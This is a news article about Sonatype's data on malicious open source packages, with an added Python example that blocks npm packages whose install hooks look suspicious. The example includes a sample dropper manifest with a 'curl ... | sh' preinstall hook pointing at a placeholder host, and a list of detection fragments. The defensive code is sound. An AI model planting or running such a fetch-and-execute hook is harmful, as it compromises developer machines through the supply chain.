The volume of malicious activity targeting upstream open source code repositories has grown by several hundred percent over the past three years, according to Sonatype.
The security vendor said in newly released data that it has detected a 700% rise in attacks designed to plant malicious code in software components, code that then executes wherever those components are pulled in by DevOps teams downstream.
Sonatype identified over 55,000 newly published packages as malicious in various open source repositories over the past year, and nearly 95,000 over the past three years.
“Almost every modern business relies on open source. Clearly, the use of open source repositories as an entry point for malicious attacks shows no signs of slowing down – making the early detection of both known and unknown security vulnerabilities more important than ever,” said Brian Fox, co-founder and CTO of Sonatype.
“Stopping malicious components before they come in the door is a fundamental element of risk prevention and should be a part of every conversation around protecting software supply chains.”
Sonatype said prevention of this sort is the only viable approach, because a malicious component can do its damage the moment it is downloaded onto a developer machine, whether or not it ever ships in a finished product.
The scale of the challenge is also far too great to be handled by manual review, the vendor added.
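The article does not spell out why a download alone is enough to cause damage. One common mechanism, offered here as an added illustration rather than anything from Sonatype's report, is that package managers run scripts from the package manifest at install time: npm executes a package's preinstall, install and postinstall scripts as part of `npm install`, before the application ever imports the package. The gate below, written for this page and not taken from any vendor tool, inspects a package.json before the package is admitted and decides whether it may be installed with scripts enabled. The manifests, the allowlist entry `native-addon-example` and the fragment list are all constructed for the example.

```python
import json

# npm runs these package.json scripts automatically when the package is
# installed as a dependency from the registry, before the application ever
# imports the package's code. (Other hooks exist; these are the ones that
# fire on a plain registry install.)
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Fragments that commonly show up in install-time payloads: fetching a remote
# script and piping it into a shell, or unpacking an embedded blob. This is a
# constructed heuristic list for the example, not a signature database.
SUSPICIOUS_FRAGMENTS = ("curl ", "wget ", "| sh", "| bash", "base64", "eval(", "child_process")


def install_hooks(manifest):
    """Return {hook_name: command} for the install-time scripts in a package.json dict."""
    scripts = manifest.get("scripts") or {}
    return {name: cmd for name, cmd in scripts.items() if name in INSTALL_HOOKS}


def suspicious_fragments(command):
    """Return the heuristic fragments present in one script command."""
    return [frag for frag in SUSPICIOUS_FRAGMENTS if frag in command]


def gate(manifest, allow_hooks_for=frozenset()):
    """Decide how a package may enter the environment.

    Verdicts:
      "allow"            no install-time scripts at all
      "allow-no-scripts" hooks present but nothing suspicious; install with scripts disabled
      "block"            a hook matches a suspicious fragment; stop it at the door
    allow_hooks_for is a reviewed allowlist of package names that legitimately
    need hooks (for example native add-ons that compile on install).
    """
    name = manifest.get("name", "<unnamed>")
    hooks = install_hooks(manifest)
    if not hooks:
        return {"name": name, "verdict": "allow", "reasons": []}
    reasons = []
    for hook, cmd in hooks.items():
        hits = suspicious_fragments(cmd)
        if hits:
            reasons.append(f"{hook}: matches {hits}")
    if reasons:
        return {"name": name, "verdict": "block", "reasons": reasons}
    hook_list = ", ".join(sorted(hooks))
    if name in allow_hooks_for:
        return {"name": name, "verdict": "allow",
                "reasons": [f"install hook(s) {hook_list} permitted by allowlist"]}
    return {"name": name, "verdict": "allow-no-scripts",
            "reasons": [f"install hook(s) {hook_list} present; not on allowlist"]}


# Constructed sample manifests for the example; none of these are real packages.
BENIGN = json.loads('{"name": "left-pad-like", "version": "1.0.0", '
                    '"scripts": {"test": "node test.js"}}')
NATIVE = json.loads('{"name": "native-addon-example", "version": "2.1.0", '
                    '"scripts": {"install": "node-gyp rebuild"}}')
DROPPER = json.loads('{"name": "useful-utils", "version": "1.0.3", "scripts": '
                     '{"preinstall": "curl -s https://example.invalid/setup.sh | sh", '
                     '"test": "echo ok"}}')

if __name__ == "__main__":
    for manifest in (BENIGN, NATIVE, DROPPER):
        print(gate(manifest, allow_hooks_for={"native-addon-example"}))
```

The "allow-no-scripts" verdict corresponds to installing with npm's `--ignore-scripts` flag, which disables lifecycle scripts for that install. A check like this only helps if it runs where the download is intercepted, for example in a repository proxy in front of the developer machine, because once the package has been unpacked and its hook has run, the verdict no longer matters. String matching on script commands is a coarse filter; it catches the obvious fetch-and-execute pattern and nothing that has been obfuscated, which is one reason the article argues the problem does not scale to manual review.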
In fact, according to Sonatype's 2021 State of the Software Supply Chain report, developers worldwide were estimated to have downloaded over 2.2 trillion open source packages or components from third-party ecosystems last year in order to accelerate time-to-market.
The story chimes with a report from the Linux Foundation earlier this year, which found that over two-fifths (41%) of organizations lack confidence in the security of their open source software, and only around half (49%) even have a policy covering the use of open source.
The same report also found that the average application development project contains 49 vulnerabilities across 80 direct dependencies, while 40% of all vulnerabilities sat in indirect (transitive) dependencies, which are harder to find because they are never declared by the project itself.